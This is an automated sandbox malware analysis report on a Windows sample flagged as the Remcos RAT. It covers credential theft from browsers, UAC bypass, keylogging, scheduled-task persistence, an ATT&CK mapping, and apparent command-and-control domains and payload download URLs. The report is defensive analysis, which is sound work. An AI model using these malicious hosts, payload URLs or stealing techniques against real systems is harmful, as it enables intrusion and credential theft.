                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
                    Source: MSBuild.exe, 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd996ca
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB
                    Source: MSBuild.exe, 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4531361836.00000000011D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager%
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager~
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00433E0A cpuid 4_2_00433E0A
                    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_0043271F
                    Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_004327AB
                    Source: C:\Users\user\Desktop\file.exeCode function: __EH_prolog,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,CharUpperW,CharUpperW,CharUpperW,CharUpperW,CharUpperW,CharUpperW,CharUpperW,lstrlenW,lstrlenW,0_2_00432AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,4_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,4_2_004470AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,4_2_004510BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_004511E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,4_2_004512EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_004513B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,4_2_00447597
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00450A7F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,4_2_00450CF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,4_2_00450D42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,4_2_00450DDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00450E6A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00424156 __EH_prolog,GetLocalTime,CopyFileW,0_2_00424156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041A7A2 GetComputerNameExW,GetUserNameW,4_2_0041A7A2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004299FC __EH_prolog,GetTimeZoneInformation,0_2_004299FC
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,5_2_00406805
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6776, type: MEMORYSTR
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data4_2_0040B21B
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \key3.db4_2_0040B335
                    Source: MusesSync.scrBinary or memory string: WIN_81
                    Source: MusesSync.scrBinary or memory string: WIN_XP
                    Source: Defensive.pif.6.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                    Source: MusesSync.scrBinary or memory string: WIN_XPe
                    Source: MusesSync.scrBinary or memory string: WIN_VISTA
                    Source: MusesSync.scrBinary or memory string: WIN_7
                    Source: MusesSync.scrBinary or memory string: WIN_8

                    Remote Access Functionality

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6776, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: cmd.exe4_2_00405042
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0020204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,23_2_0020204C
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_00201A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,23_2_00201A4A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information11
                    Scripting                    		2
                    Valid Accounts                    		131
                    Windows Management Instrumentation                    		11
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		21
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services12
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		221
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol221
                    Input Capture                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts22
                    Command and Scripting Interpreter                    		2
                    Valid Accounts                    		1
                    Bypass User Account Control                    		3
                    Obfuscated Files or Information                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares3
                    Clipboard Data                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts111
                    Scheduled Task/Job                    		1
                    Windows Service                    		2
                    Valid Accounts                    		31
                    Software Packing                    		NTDS4
                    File and Directory Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts2
                    Service Execution                    		111
                    Scheduled Task/Job                    		21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		LSA Secrets147
                    System Information Discovery                    		SSHKeylogging13
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled Task21
                    Registry Run Keys / Startup Folder                    		1
                    Windows Service                    		1
                    Bypass User Account Control                    		Cached Domain Credentials351
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items322
                    Process Injection                    		111
                    Masquerading                    		DCSync241
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job111
                    Scheduled Task/Job                    		2
                    Valid Accounts                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt21
                    Registry Run Keys / Startup Folder                    		241
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow11
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                    Access Token Manipulation                    		Network Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd322
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558585 Sample: file.exe Startdate: 19/11/2024 Architecture: WINDOWS Score: 100 67 oportunidad-escolombiasegura.cfd 2->67 69 comercio0025.dns.army 2->69 71 7 other IPs or domains 2->71 93 Suricata IDS alerts for network traffic 2->93 95 Found malware configuration 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 21 other signatures 2->99 10 file.exe 1 3 2->10         started        14 ywezrgl.exe 27 2->14         started        16 wscript.exe 2->16         started        18 wscript.exe 2->18         started        signatures3 process4 file5 63 C:\Users\user\Pictures\...\QuickTextPaste.exe, PE32 10->63 dropped 113 Detected unpacking (creates a PE file in dynamic memory) 10->113 115 Contains functionality to register a low level keyboard hook 10->115 117 Writes to foreign memory regions 10->117 123 3 other signatures 10->123 20 csc.exe 16 3 10->20         started        119 Multi AV Scanner detection for dropped file 14->119 25 cmd.exe 3 14->25         started        121 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->121 27 MusesSync.scr 16->27         started        29 MusesSync.scr 18->29         started        signatures6 process7 dnsIp8 73 comercio0025.dns.army 181.141.40.225, 3020, 30201, 3021 EPMTelecomunicacionesSAESPCO Colombia 20->73 75 contath.org 69.49.234.173, 443, 49742 UNIFIEDLAYER-AS-1US United States 20->75 77 bhcc.com.sa 74.220.219.13, 443, 49773 UNIFIEDLAYER-AS-1US United States 20->77 59 C:\Users\user\AppData\Local\...\ywezrgl.exe, PE32 20->59 dropped 101 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 20->101 103 Writes to foreign memory regions 20->103 105 Allocates memory in foreign processes 20->105 107 Injects a PE file into a foreign processes 20->107 31 MSBuild.exe 3 16 20->31         started        61 C:\Users\user\AppData\Local\...\Defensive.pif, PE32 25->61 dropped 109 Drops PE files with a suspicious file extension 25->109 111 Uses schtasks.exe or at.exe to add and modify task schedules 25->111 35 Defensive.pif 25->35         started        38 cmd.exe 2 25->38         started        40 conhost.exe 25->40         started        42 7 other processes 25->42 file9 signatures10 process11 dnsIp12 79 geoplugin.net 178.237.33.50, 49764, 50063, 80 ATOM86-ASATOM86NL Netherlands 31->79 81 Contains functionality to bypass UAC (CMSTPLUA) 31->81 83 Contains functionalty to change the wallpaper 31->83 85 Contains functionality to steal Chrome passwords or cookies 31->85 91 2 other signatures 31->91 55 C:\Users\user\AppData\Local\...\MusesSync.scr, PE32 35->55 dropped 57 C:\Users\user\AppData\Local\...\MusesSync.js, ASCII 35->57 dropped 87 Drops PE files with a suspicious file extension 35->87 89 Installs a global keyboard hook 35->89 44 cmd.exe 35->44         started        47 cmd.exe 35->47         started        file13 signatures14 process15 file16 65 C:\Users\user\AppData\...\MusesSync.url, MS 44->65 dropped 49 conhost.exe 44->49         started        51 conhost.exe 47->51         started        53 schtasks.exe 47->53         started        process17

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe50%ReversingLabsWin32.Trojan.Generic
                    file.exe100%AviraTR/Crypt.XPACK.Gen2
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\Pictures\QuickTextPaste\Bin\QuickTextPaste.exe100%AviraTR/Crypt.XPACK.Gen2
                    C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr5%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\88473\Defensive.pif5%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\ywezrgl.exe54%ReversingLabsWin32.Trojan.Generic

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    oportunidad-escolombiasegura.cfd0%Avira URL Cloudsafe
                    https://bhcc.com.sa0%Avira URL Cloudsafe
                    http://bhcc.com.sa0%Avira URL Cloudsafe
                    https://contath.org/zmouse.exe0%Avira URL Cloudsafe
                    https://bhcc.com.sa/RacingLot.exe0%Avira URL Cloudsafe
                    http://contath.org0%Avira URL Cloudsafe
                    https://contath.org0%Avira URL Cloudsafe
                    http://schemas.microsoftR0%Avira URL Cloudsafe
                    https://bhcc.c40%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    		199.232.214.172
                    		truefalse
                      		high
                      oportunidad-escolombiasegura.cfd
                      		181.141.40.225
                      		truetrue
                        		unknown
                        geoplugin.net
                        		178.237.33.50
                        		truefalse
                          		high
                          comercio0025.dns.army
                          		181.141.40.225
                          		truetrue
                            		unknown
                            s-part-0015.t-0009.t-msedge.net
                            		13.107.246.43
                            		truefalse
                              		high
                              bhcc.com.sa
                              		74.220.219.13
                              		truefalse
                                		unknown
                                fp2e7a.wpc.phicdn.net
                                		192.229.221.95
                                		truefalse
                                  		high
                                  contath.org
                                  		69.49.234.173
                                  		truefalse
                                    		unknown
                                    QxbVNDtCpHrITON.QxbVNDtCpHrITON
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://contath.org/zmouse.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      oportunidad-escolombiasegura.cfdtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://geoplugin.net/json.gpfalse
                                        		high
                                        https://bhcc.com.sa/RacingLot.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://stackoverflow.com/q/14436606/23354csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netJcsc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://geoplugin.net/json.gplMSBuild.exe, 00000004.00000002.4531361836.00000000011D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://geoplugin.net/json.gpbrMSBuild.exe, 00000004.00000002.4531361836.00000000011D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/mgravell/protobuf-netcsc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://geoplugin.net/json.gpGrMSBuild.exe, 00000004.00000002.4531361836.00000000011D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://geoplugin.net/json.gpqMSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.autoitscript.com/autoit3/Xywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000000.2416940254.0000000000745000.00000002.00000001.01000000.0000000A.sdmp, MusesSync.scr, 00000017.00000002.2491456688.0000000000255000.00000002.00000001.01000000.0000000C.sdmp, MusesSync.scr, 0000001A.00000000.2565892972.0000000000255000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                        		high
                                                        http://nsis.sf.net/NSIS_ErrorErrorcsc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, ywezrgl.exe, 00000005.00000002.2428450495.0000000000408000.00000002.00000001.01000000.00000008.sdmp, ywezrgl.exe, 00000005.00000000.2329859407.0000000000408000.00000002.00000001.01000000.00000008.sdmp, ywezrgl.exe.2.drfalse
                                                          		high
                                                          https://bhcc.com.sacsc.exe, 00000002.00000002.4532919919.0000000006EF6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://bhcc.com.sacsc.exe, 00000002.00000002.4532919919.0000000006F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.autoitscript.com/autoit3/ywezrgl.exe, 00000005.00000003.2372891736.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2849107659.0000000002061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contath.orgcsc.exe, 00000002.00000002.4532919919.000000000712D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://github.com/mgravell/protobuf-neticsc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://geoplugin.net/json.gp/Ccsc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://stackoverflow.com/q/11564914/23354;csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://stackoverflow.com/q/2152978/23354csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.microsoftRcsc.exe, 00000002.00000002.4534522380.00000000095C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://contath.orgcsc.exe, 00000002.00000002.4532919919.0000000007149000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://bhcc.c4csc.exe, 00000002.00000002.4532919919.0000000006F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecsc.exe, 00000002.00000002.4532919919.0000000007151000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      74.220.219.13
                                                                      		bhcc.com.saUnited States
                                                                      		46606UNIFIEDLAYER-AS-1USfalse
                                                                      178.237.33.50
                                                                      		geoplugin.netNetherlands
                                                                      		8455ATOM86-ASATOM86NLfalse
                                                                      69.49.234.173
                                                                      		contath.orgUnited States
                                                                      		46606UNIFIEDLAYER-AS-1USfalse
                                                                      181.141.40.225
                                                                      		oportunidad-escolombiasegura.cfdColombia
                                                                      		13489EPMTelecomunicacionesSAESPCOtrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1558585
                                                                      Start date and time:2024-11-19 15:56:08 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 13m 53s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:27
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:file.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.rans.troj.spyw.expl.evad.winEXE@41/26@7/4
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 87%
                                                                      • Number of executed functions: 112
                                                                      • Number of non-executed functions: 149
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 199.232.214.172, 192.229.221.95, 52.165.164.15, 20.242.39.171, 199.232.210.172
                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: file.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      09:57:22API Interceptor2629763x Sleep call for process: csc.exe modified
                                                                      09:57:58API Interceptor4674257x Sleep call for process: MSBuild.exe modified
                                                                      09:58:21API Interceptor3524x Sleep call for process: Defensive.pif modified
                                                                      15:57:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run QuickTextPaste C:\Users\user\Pictures\QuickTextPaste\Bin\QuickTextPaste.exe
